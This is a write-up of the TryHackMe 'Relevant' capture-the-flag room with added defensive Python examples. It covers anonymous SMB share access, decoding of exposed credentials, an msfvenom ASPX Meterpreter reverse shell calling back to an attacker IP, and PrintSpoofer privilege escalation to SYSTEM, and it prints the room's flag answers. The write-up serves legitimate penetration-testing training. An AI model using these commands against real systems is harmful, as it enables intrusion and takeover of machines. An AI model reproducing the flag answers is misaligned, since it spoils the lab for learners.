In this post, we covered a black box penetration testing challenge in which we performed initial port scanning, found a network share from which we extracted sensitive data, and uploaded a reverse shell generated by msfvenom. After gaining access, we found that the account we landed as holds SeImpersonatePrivilege, which allowed PrintSpoofer to be used to reach SYSTEM (root) access. This was part of TryHackMe Relevant.

Task Description

You have been assigned to a client that wants a penetration test conducted on an environment due to be released to production in seven days. 

Scope of Work

The client requests that an engineer conducts an assessment of the provided virtual environment. The client has asked that minimal information be provided about the assessment, wanting the engagement conducted from the eyes of a malicious actor (black box penetration test).  The client has asked that you secure two flags (no location provided) as proof of exploitation:

  • User.txt
  • Root.txt

Additionally, the client has provided the following scope allowances:

  • Any tools or techniques are permitted in this engagement, however we ask that you attempt manual exploitation first
  • Locate and note all vulnerabilities found
  • Submit the flags discovered to the dashboard
  • Only the IP address assigned to your machine is in scope
  • Find and report ALL vulnerabilities (yes, there is more than one path to root)

(Roleplay off) I encourage you to approach this challenge as an actual penetration test. Consider writing a report, to include an executive summary, vulnerability and exploitation assessment, and remediation suggestions, as this will benefit you in preparation for the eLearnSecurity Certified Professional Penetration Tester or career as a penetration tester in the field.

Note – Nothing in this room requires Metasploit

Penetration Testing Methodology

  1. Reconnaissance
  2. Enumeration
  3. Exploiting
  4. Privilege Escalation

Port Scanning Results

An Nmap scan is conducted in two parts: first to detect open ports, then to enumerate services and versions. Key services found include:

  • HTTP servers on ports 80 and 49663 (both running IIS 10.0),
  • SMB (port 445) for network sharing,
  • Remote Desktop Protocol (port 3389).

PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds  Windows Server 2016 Standard Evaluation 14393 microsoft-ds
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: RELEVANT
|   NetBIOS_Domain_Name: RELEVANT
|   NetBIOS_Computer_Name: RELEVANT
|   DNS_Domain_Name: Relevant
|   DNS_Computer_Name: Relevant
|   Product_Version: 10.0.14393
|_  System_Time: 2020-10-03T23:01:57+00:00
| ssl-cert: Subject: commonName=Relevant
| Not valid before: 2020-07-24T23:16:08
|_Not valid after:  2021-01-23T23:16:08
|_ssl-date: 2020-10-03T23:02:37+00:00; 0s from scanner time.
49663/tcp open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
49666/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h24m00s, deviation: 3h07m51s, median: 0s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
|   Computer name: Relevant
|   NetBIOS computer name: RELEVANT\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-10-03T16:02:00-07:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-10-03T23:02:01
|_  start_date: 2020-10-03T22:54:55
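The scan output above is worth reading with a hardening checklist in hand rather than just as a port list. The following Python is an added example (not part of the original walkthrough) that parses Nmap's normal-format output into structured entries and applies a few triage rules a reviewer would want flagged: the TRACE method being allowed on both IIS instances, SMB answering to a guest session, SMB signing not being required, and RDP/SMB being reachable at all. The embedded input is an abbreviated copy of the scan shown above, and the rule set and wording are this example's own.

```python
import re

# Constructed input: an abbreviated copy of the Nmap normal-format output from
# the walkthrough above (host RELEVANT). Trailing spaces match Nmap's output.
NMAP_OUTPUT = """\
PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds  Windows Server 2016 Standard Evaluation 14393 microsoft-ds
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
49663/tcp open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
49666/tcp open  msrpc         Microsoft Windows RPC

Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
"""

# One port line: "<port>/<proto> <state> <service> <version...>"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


def parse_nmap(text):
    """Return (ports, host_scripts). Each port is a dict with the NSE script
    lines that followed it; lines after 'Host script results' go to host_scripts."""
    ports, host_scripts = [], []
    current = None  # the list currently receiving "|"-prefixed script lines
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            entry = {"port": int(port), "proto": proto, "state": state,
                     "service": service, "version": version.strip(), "scripts": []}
            ports.append(entry)
            current = entry["scripts"]
        elif line.startswith("Host script results"):
            current = host_scripts
        elif line.startswith("|") and current is not None:
            # Drop the "| " / "|_ " prefix and the indentation NSE adds.
            current.append(line.lstrip("|_ ").strip())
    return ports, host_scripts


def triage(ports, host_scripts):
    """Apply simple hardening checks. Returns a list of (port, finding) tuples;
    port is None for host-level findings."""
    findings = []
    for p in ports:
        if p["state"] != "open":
            continue
        script_text = " ".join(p["scripts"])
        if p["service"] == "http" and "TRACE" in script_text:
            findings.append((p["port"], "HTTP TRACE method allowed; disable it in IIS request filtering"))
        if p["port"] == 3389:
            findings.append((p["port"], "RDP exposed; restrict to a management network or VPN and require NLA"))
        if p["port"] == 445:
            findings.append((p["port"], "SMB exposed; review share ACLs and anonymous access"))
    host_text = " ".join(host_scripts).lower()
    if "account_used: guest" in host_text:
        findings.append((None, "SMB accepted a guest/anonymous session; disable guest access"))
    if "message_signing: disabled" in host_text or "enabled but not required" in host_text:
        findings.append((None, "SMB signing not required; enforce signing via policy"))
    return findings


if __name__ == "__main__":
    ports, host = parse_nmap(NMAP_OUTPUT)
    for port, finding in triage(ports, host):
        print(f"{port if port else 'host':>5}  {finding}")
```

The parser keys script lines to the port entry they follow, which is what makes the per-port TRACE check possible; the host-level checks operate on the `Host script results` block instead, so they are not attributed to the last port in the list by mistake.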

Listing Network Shares & Extracting Data

The video shows accessing the SMB shares without credentials. A share named nt4wrksv is discovered and accessed anonymously, leading to a file named passwords.txt.

Passwords File: The file contains Base64-encoded credentials which, after decoding, reveal the usernames (bill, bob) and their passwords.

RDP Login Attempts: With the decoded usernames and passwords, attempts are made to log in via RDP and via SMB using PsExec. Both fail, indicating either that the credentials are no longer valid or that the accounts lack remote logon permissions.

The investigation shifts back to the web servers on ports 80 and 49663. After examining both, the focus moves to port 49663 for further exploitation; a directory brute-forcing tool is used to identify possible entry points on that web server.

An upload test (the test.txt visible in the later listing) confirms write access to the nt4wrksv share. This opens the possibility of uploading a reverse-shell file that can later be executed to gain remote access.

$ smbclient -L //10.10.11.52
Enter WORKGROUP\kali's password: 

    Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    C$              Disk      Default share
    IPC$            IPC       Remote IPC
    nt4wrksv        Disk      
SMB1 disabled -- no workgroup available
$ smbclient //10.10.11.52/nt4wrksv
Enter WORKGROUP\kali's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Jul 25 23:46:04 2020
  ..                                  D        0  Sat Jul 25 23:46:04 2020
  passwords.txt                       A       98  Sat Jul 25 17:15:33 2020

        7735807 blocks of size 4096. 4951539 blocks available
smb: \> get passwords.txt 
getting file \passwords.txt of size 98 as passwords.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \> exit
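Decoding the passwords file is the first hands-on step above, and it is easy to get wrong on real files: header or comment lines that are not Base64, lines whose `=` padding was stripped, and bytes that do not decode as UTF-8. The following Python is an added example (not from the walkthrough) that handles those cases; the sample file content and the two user:password pairs in it are constructed for this example and are not the room's real credentials.

```python
import base64
import binascii
import re

# Constructed stand-in for the passwords.txt found on the nt4wrksv share:
# a comment line followed by one Base64 line per account. The second line
# has had its "=" padding stripped on purpose. Values are made up.
PASSWORDS_TXT = """\
# account list (encoded)
Ym9iOnMzY3JldA==
YmlsbDpwYTU1d29yZA
"""

# Standard Base64 alphabet with optional padding; anything else is skipped.
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def decode_line(line):
    """Decode one Base64 line, tolerating stripped '=' padding.
    Returns the raw bytes, or None if the line is not valid Base64."""
    line = line.strip()
    if not line or not B64_RE.match(line):
        return None
    padded = line + "=" * (-len(line) % 4)  # restore padding to a multiple of 4
    try:
        return base64.b64decode(padded, validate=True)
    except binascii.Error:
        return None


def extract_credentials(text, separator=":"):
    """Return {username: password} for every decodable 'user<separator>pass' line.
    Lines that are not Base64 or do not contain the separator are ignored."""
    creds = {}
    for line in text.splitlines():
        raw = decode_line(line)
        if raw is None:
            continue
        decoded = raw.decode("utf-8", errors="replace")  # keep going on odd bytes
        if separator not in decoded:
            continue
        user, _, password = decoded.partition(separator)
        creds[user.strip().lower()] = password.strip()
    return creds


if __name__ == "__main__":
    for user, password in extract_credentials(PASSWORDS_TXT).items():
        print(f"{user}: {password}")
```

The `separator` parameter exists because files like this use whatever delimiter the author chose (`:`, ` - `, a tab); pass the one you see after decoding a line by hand.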

Uploading Reverse Shell to Network Shares

$ msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=10.8.22.11 lport=4444 -f aspx -o shell.aspx
smb: \> put shell.aspx 
putting file shell.aspx as \shell.aspx (12.9 kb/s) (average 7.9 kb/s)
smb: \> ls
  .                                   D        0  Thu Aug 27 22:48:34 2020
  ..                                  D        0  Thu Aug 27 22:48:34 2020
  passwords.txt                       A       98  Sat Jul 25 17:15:33 2020
  shell.aspx                          A    38409  Thu Aug 27 22:48:37 2020
  test.txt                            A        5  Thu Aug 27 22:42:10 2020

        7735807 blocks of size 4096. 4946700 blocks available
smb: \> 
kali@kali:/data/vpn$ msfconsole -q
msf5 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter_reverse_tcp
payload => windows/x64/meterpreter_reverse_tcp
msf5 exploit(multi/handler) > set lhost 10.8.22.11
lhost => 10.8.22.11
msf5 exploit(multi/handler) > set lport 4444
lport => 4444
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.8.22.11:4444

Windows Privilege Escalation

Checking the privileges with getprivs in the Meterpreter session reveals that the account we are running as holds SeImpersonatePrivilege.

meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeImpersonatePrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege

Exploiting PrintSpoofer Vulnerability

PrintSpoofer is an exploit that can be used to escalate service user permissions on Windows Server 2016, Server 2019, and Windows 10.

To escalate privileges, the service account must hold SeImpersonatePrivilege. To execute:

PrintSpoofer.exe -i -c cmd

With that privilege in place, this should yield a shell running as NT AUTHORITY\SYSTEM.
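Both the getprivs listing above and the PrintSpoofer precondition come down to one question: which token privileges does the service account hold? The following Python is an added example (not part of the walkthrough or of PrintSpoofer) that parses either Meterpreter's getprivs output or `whoami /priv` output and reports the privileges that are well known to allow escalation, so an administrator can audit service accounts before a tester does. The `whoami /priv` sample is constructed to carry the same seven privileges the walkthrough lists, and the risk table is this example's own; note that a privilege shown as Disabled is still present in the token.

```python
import re

# Constructed sample of `whoami /priv` output for a service account, carrying
# the same privilege set that the walkthrough's getprivs listing shows.
WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# Constructed sample in Meterpreter getprivs format (names only, no state column).
GETPRIVS = """\
Enabled Process Privileges
==========================

Name
----
SeChangeNotifyPrivilege
SeImpersonatePrivilege
"""

# Privileges that let a process holding them reach SYSTEM or equivalent.
# PrintSpoofer and the potato family rely on the first two.
HIGH_RISK = {
    "SeImpersonatePrivilege": "token impersonation (PrintSpoofer / potato family)",
    "SeAssignPrimaryTokenPrivilege": "primary token assignment (potato family)",
    "SeBackupPrivilege": "read any file regardless of ACL",
    "SeRestorePrivilege": "write any file or registry key regardless of ACL",
    "SeDebugPrivilege": "open any process",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeLoadDriverPrivilege": "load kernel drivers",
}

PRIV_NAME_RE = re.compile(r"^(Se\w+Privilege)\b")


def parse_privileges(text):
    """Return {privilege_name: state} from `whoami /priv` or getprivs output.
    getprivs prints names only, and only lists held privileges, so those are
    recorded as 'Enabled'."""
    privs = {}
    for line in text.splitlines():
        m = PRIV_NAME_RE.match(line.strip())
        if not m:
            continue
        state = "Disabled" if line.rstrip().endswith("Disabled") else "Enabled"
        privs[m.group(1)] = state
    return privs


def audit(privs):
    """Return {privilege: why it matters} for every high-risk privilege held.
    State is deliberately ignored: a Disabled privilege is still in the token
    and the process can enable it with AdjustTokenPrivileges."""
    return {name: HIGH_RISK[name] for name in privs if name in HIGH_RISK}


if __name__ == "__main__":
    held = parse_privileges(WHOAMI_PRIV)
    for name, reason in audit(held).items():
        print(f"{name:<30} {held[name]:<9} {reason}")
```

The remediation for a finding here is not to patch the tool but to change the account: run the application pool or service under an identity that does not need SeImpersonatePrivilege, or, where IIS genuinely requires it, keep the web root non-writable so nothing can be uploaded and executed as that identity in the first place.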

c:\inetpub\wwwroot\nt4wrksv>PrintSpoofer.exe -i -c powershell.exe
PrintSpoofer.exe -i -c powershell.exe
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Windows PowerShell 
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami
whoami
nt authority\system

Room Answers | TryHackMe Relevant

User Flag

THM{fdk4ka34vk346ksxfr21tg789ktf45}

Root Flag

THM{1fk5kf469devly1gl320zafgl345pv}

Video Walkthrough | TryHackMe Relevant Walkthrough

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, a cybersecurity content creator and YouTuber.